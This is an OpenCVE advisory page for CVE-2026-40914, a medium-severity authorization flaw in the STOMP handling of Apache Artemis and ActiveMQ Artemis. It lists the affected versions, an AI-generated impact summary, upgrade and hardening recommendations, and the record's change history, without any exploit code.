Description
A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission.



This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0.

Users are recommended to upgrade to version 2.54.0, which fixes the issue.
Published: 2026-05-28
Score: 4.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A flaw in Apache Artemis’ STOMP handling allows a user with send or consume rights to alter an address’s routing type, even without createAddress authority. This unintended elevation means the user can effectively reconfigure how messages are routed, violating the intended isolation between actions. The weakness stems from insufficient permission checks, allowing routing-type changes for an address that should be immutable from the perspective of the user.

Affected Systems

The issue impacts Apache Artemis from versions 2.50.0 through 2.53.0 and Apache ActiveMQ Artemis from 2.0.0 through 2.44.0. Both implementations share the same underlying address configuration logic, so the alteration can occur in any deployment that uses the STOMP protocol and has an address to which send or consume operations are allowed.

Risk and Exploitability

The CVSS score of 4.3 indicates a moderate severity; no public exploit is reported. However, the vulnerability represents a privilege escalation that could allow an attacker to redirect or drop messages by changing an address’s routing type. The absence from the CISA KEV catalog suggests no known large‑scale exploitation yet, but the potential to bypass address‑level safeguards warrants prompt action. An attacker would need only a valid STOMP session with send or consume rights, making the attack surface relatively broad.

Generated by OpenCVE AI on May 29, 2026 at 13:28 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to Apache Artemis 2.54.0 or later (Apache ActiveMQ Artemis 2.45.0 or later).
  • Restrict STOMP security credentials to the minimal permissions required for operation, ensuring that send/consume rights are not granted to users who should not alter address routing.
  • Review and enforce createAddress permissions, verifying that any address modifications are authorized before deployment.
  • Monitor STOMP traffic for unexpected routing type changes or message re‑routing anomalies.

Generated by OpenCVE AI on May 29, 2026 at 13:28 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 29 May 2026 16:00:00 +0000

Type Values Removed Values Added
First Time appeared Apache activemq Artemis Stomp Protocol
Apache artemis Stomp Protocol
Vendors & Products Apache activemq Artemis Stomp Protocol
Apache artemis Stomp Protocol

Fri, 29 May 2026 12:30:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache activemq Artemis
Apache artemis
CPEs cpe:2.3:a:apache:activemq_artemis:*:*:*:*:*:*:*:*
cpe:2.3:a:apache:artemis:*:*:*:*:*:*:*:*
Vendors & Products Apache
Apache activemq Artemis
Apache artemis
Metrics cvssV3_1

{'score': 4.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}

Thu, 28 May 2026 14:30:00 +0000

Type Values Removed Values Added
References

Thu, 28 May 2026 12:45:00 +0000

Type Values Removed Values Added
Description A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission. This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.54.0, which fixes the issue.
Title Apache Artemis Stomp Protocol, Apache ActiveMQ Artemis Stomp Protocol: Address routing-type can be updated by STOMP protocol user without the createAddress permission
Weaknesses CWE-863
References

Subscriptions

Apache Activemq Artemis Activemq Artemis Stomp Protocol Artemis Artemis Stomp Protocol
cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-05-28T13:15:25.457Z

Reserved: 2026-04-15T17:18:02.939Z

Link: CVE-2026-40914

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2026-05-28T13:16:23.013

Modified: 2026-05-29T12:25:08.967

Link: CVE-2026-40914

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-29T15:48:33Z

Weaknesses